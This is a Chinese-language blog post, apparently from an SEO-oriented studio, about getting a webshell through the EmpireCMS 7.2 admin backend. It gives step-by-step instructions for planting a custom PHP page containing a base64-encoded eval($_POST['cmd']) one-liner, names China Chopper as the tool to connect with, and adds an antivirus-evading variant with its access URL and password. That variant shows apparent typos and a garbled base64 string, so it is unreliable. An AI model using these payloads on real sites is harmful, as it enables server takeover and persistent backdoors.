帝国cms 7.2后台拿shell,帝国cms 7.2 webshell,帝国cms 7.2漏洞利用,帝国cms7.2 漏洞,帝国cms最新漏洞,empirecms 7.2 漏洞,empirecms 7.2 shell,empirecms 7.2 漏洞利用,EmpireCMS(帝国cms)
大家都知道帝国cms的安全性能也是数一数二的,很多做SEO的站都选择了帝国cms。雨过天晴工作室对帝国也是很认可,在使用的过程中,发现帝国cms7.2有一个漏洞,可以直接拿shell,如果内容直接添一句话或者php大马是无用的,因为他会生成xxx.php前先给你执行!
但是如果利用script就可以,在后台栏目-自定义页面-增加自定义页面-随便写了xxx.php文件名,
页面内容填写,<script language="php">echo base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=");</script>
(PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= 就是 <?php @eval($_POST['cmd']);?>的base64加密。)
所以生成xxx.php后 会出现内容 <?php @eval($_POST['cmd']);?> 在文件里,然后用菜刀直接连接吧!!
如果说,服务器安装了杀软 默认的这种是直接被杀掉的。
我写了一个免杀的一句话 在护卫神已经测试过免杀 其他的其他大伙再进行测试吧。!
<script language="php">
$as=$_GET['code'];
$sd=$~GET['sd'];
if($as==211){
$t="PD9waHAg".$sd;
}else{
$t=123;
}
echo base64_decode($t."=");</script>
一句话地址://127.0.0.1/test.php?code=211&sd=QGV2YWwoJF9QTlNUWydjbWQnXSk7Pz4
密码是cmd
不过说下 这个适合那种留后面的一句话使用 如果说 不知道后台账号密码的话也是白搭
需要代码直接联系QQ客服 请勿做危险之事